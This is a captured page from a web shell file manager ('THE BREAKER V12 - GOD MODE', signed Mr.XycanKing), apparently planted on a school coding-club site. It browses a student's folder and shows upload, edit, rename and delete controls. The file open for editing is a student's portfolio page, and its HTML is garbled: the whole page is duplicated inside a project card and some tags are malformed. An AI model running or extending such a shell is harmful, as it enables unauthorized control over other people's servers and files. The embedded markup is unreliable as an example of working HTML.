[ THE BREAKER V12 - GOD MODE ]
BABAYO EROR SYSTEM
LOCATION:
/
home
/
luplupi1
/
code.ekskul.my.id
/
p
/
Shihab_11Saintek2
/
GOD UPLOAD
NAME
SIZE
ACTION
[ .. BACK ]
--
--
projek perdana shihab2.html
4.81 KB
[EDIT]
|
[REN]
|
[DEL]
projek3.0.html
4.02 KB
[EDIT]
|
[REN]
|
[DEL]
Editing:
projek3.0.html
<!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>My Portfolio</title> <link rel="stylesheet" href="style.css"> </head> <body> <!-- NAVBAR --> <header> <nav class="navbar"> <h2 class="logo">MyPortfolio</h2> <ul> <li><a href="#home">Home</a></li> <li><a href="#about">About</a></li> <li><a href="#projects">Projects</a></li> <li><a href="#contact">Contact</a></li> </ul> </nav> </header> <!-- HERO --> <section id="home" class="hero"> <h1>Hello, I'm <span class="highlight">Muhammad Zaki from Indonesia</span></h1> <p>Web Developer | UI/UX Enthusiast</p> <button onclick="scrollToSection('projects')" class="btn-primary">View Projects</button> </section> <!-- ABOUT --> <section id="about" class="about"> <h2>About Me</h2> <p> I am a developer interested in web development, UI/UX design, and creating modern applications. I love learning new technologies and building meaningful digital products. </p> </section> <!-- PROJECTS --> <section id="projects" class="projects"> <h2>My Projects</h2> <div class="project-grid"> <div class="project-card"> <h3>Project 1</h3> <p. </p> </div> <div class="project-card"> <h3>Project 2</h3> <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>My Portfolio</title> <link rel="stylesheet" href="style.css"> </head> <body> <!-- NAVBAR --> <header> <nav class="navbar"> <h2 class="logo">MyPortfolio</h2> <ul> <li><a href="#home">Home</a></li> <li><a href="#about">About</a></li> <li><a href="#projects">Projects</a></li> <li><a href="#contact">Contact</a></li> </ul> </nav> </header> <!-- HERO --> <section id="home" class="hero"> <h1>Hello, I'm <span class="highlight">Your Name</span></h1> <p>Web Developer | UI/UX Enthusiast</p> <button onclick="scrollToSection('projects')" class="btn-primary">View Projects</button> </section> <!-- ABOUT --> <section id="about" class="about"> <h2>About Me</h2> <p> I am a developer interested in web development, UI/UX design, and creating modern applications. I love learning new technologies and building meaningful digital products. </p> </section> <!-- PROJECTS --> <section id="projects" class="projects"> <h2>My Projects</h2> <div class="project-grid"> <div class="project-card"> <h3>Project 1</h3> <p>Actually this was my first junior high school, when i was in 8 grade.</p> </div> <div class="project-card"> <h3>Project 2</h3> </p> I've made this in my late years of junior high school, pretty weird actually.</p> </div> <div class="project-card"> <h3>Project 3</h3> <p>My recent project, which is what youre reading right now.</p> </div> </div> </section> <!-- CONTACT --> <section id="contact" class="contact"> <h2>Contact</h2> <form> <input type="text" placeholder="Name" required> <input type="email" placeholder="Email" required> <textarea placeholder="Message" required></textarea> <button class="btn-primary" type="submit">Send</button> </form> </section> <footer> <p>© 2025 Created by You.</p>
SAVE CHANGES
© Mr.XycanKing